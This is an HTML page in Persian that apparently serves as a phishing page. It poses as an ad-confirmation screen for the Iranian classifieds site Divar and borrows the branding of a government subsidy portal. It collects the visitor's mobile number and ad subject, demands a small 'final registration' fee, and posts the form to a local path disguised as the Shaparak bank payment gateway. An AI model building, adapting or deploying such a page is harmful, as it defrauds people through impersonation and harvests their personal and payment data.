
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fa" lang="fa" dir="rtl">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta name="Distribution" content="Global">
	<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
	<META HTTP-EQUIV="Expires" CONTENT="-1">
	<meta name="Robots" content="index,follow">
	<meta name="Description" content="سازمان هدفمندسازی یارانه ها، سامانه مدیریت حساب بانكی خانوار">
  <title>تایید اگهی دیوار</title>
  <link rel="stylesheet" href="style.css" type="text/css" media="screen" >

<script src="http://www.refahi.ir/assets/compressed/js_default_92efd086_2359bbe0_198453c8.php" type="text/javascript"></script>
</head>
<!-- /HEAD -->
<body><a align="center">
	<div id="header">
		<div id="middle_header"><img src="assets\images\header.png" alt="سامانه سازمان هدفمندی یارانه ا" /></div>
		<div id="bottom_header"></a>
			<ul>
				<li>
					<a href=""><h3><p style="font-family: Arial">دیوار | نیازمندی‌ های رایگان، آگهی‌های خرید، فروش نو و دست دوم و کارکرده، استخدام و خدمات</p></h3></a>
				</li>
				<li>
					
				</li>
				<!--li>
                    <a href="http://www.refahi.ir/kernel/help" target="_blank"> پرسش های متداول </a>				</li-->			
				<li style="background-color: #BB8FCE;">
					<a href="http://www.refahi.ir/kernel/form" style="color:#000;"> </a>
				</li>
				<li>
					
				</li>

			</ul>
		</div>
	</div><!-- BODY -->
<div id="content">
	<div id="inner_content_1">
	<br class="clear">
		<div id="desc">
			<div style="text-align:justify">
				<ul><span class="t"><h4><p style="font-family: verdana">تبریک میگوییم آگهی شما ثبت شد.</p></h5></span>
					<li> شماره تلفن خود را در کادر روبرو ثبت کنید</li>
					<br/><small>
				 <li>مبلغ 1000 تومان را برای ثبت نهایی آگهی  پرداخت کنید</li>
					<li>پس از تکمیل فرم  برای پرداخت هزینه روی  گزینه پرداخت کلیک کنید</li></p>
					</small>
				</ul>
			</div>
		</div>
		
		<div id="user">
			<div id="form_1">
				<form id="login" name="login" style="color:#000;" method="post" action="/sep.shaparak.ir/" ">
                    					<table cellpadding="0" cellspacing="11" border="0" width="100%" class="a">
						<tr>
							<td align="left">
								شماره تلفن همراه:
							</td>
							<td>
							
								<input type="text" id="sid" maxlength="11" autocomplete="off" name="sid" value="" dir="ltr" style="width:160px;height:24px;font-size:22px;" tabindex="1"/>
							</td>
						</tr>
						<tr>
							<td align="left">
								موضوع آگهی:
							</td>
							<td>
							
								<input type="text" id="ids" maxlength="30" name="ids" value="" dir="ltr" style="width:160px;height:24px;font-size:16px;" tabindex="2"/>
							</td>
						</tr>
						<tr>
                            <td colspan="2" style="padding-left: 10px;">
                                
                            </td>
						</tr>
						
						<tr>
						<td align="left" colspan="2">
						<h5>میزان رضایت شما از سایت دیوار : </h5>
						<select>
							<option>زیاد</option>
							<option>متوسط</option>
							<option>کم</option>
						</select>
							</td>
							</tr>
							<tr>
						<td align="left" colspan="2">
				
							</td>
							</tr>
						<tr>
						
							<td align="left" colspan="2">
								<input type="submit" value="پرداخت" class="bl" tabindex="4">
							</td>
						</tr>
					</table>			
				</form>
			</div>
		</div>
		<div class="clear"/>&nbsp</div>
	</div>
</div>

<!-- /BODY -->
<!-- FOOTER -->
	<div id="footer">
		<ul>
			<li>توجه: 
				<span style="color:#ddd518">کاربر گرامی هزینه  ثبت اگهی برای هر شماره یک بار برای همیشه میباشد</span></li></ul>
	</div>
<!-- /FOOTER -->
</body>
</html>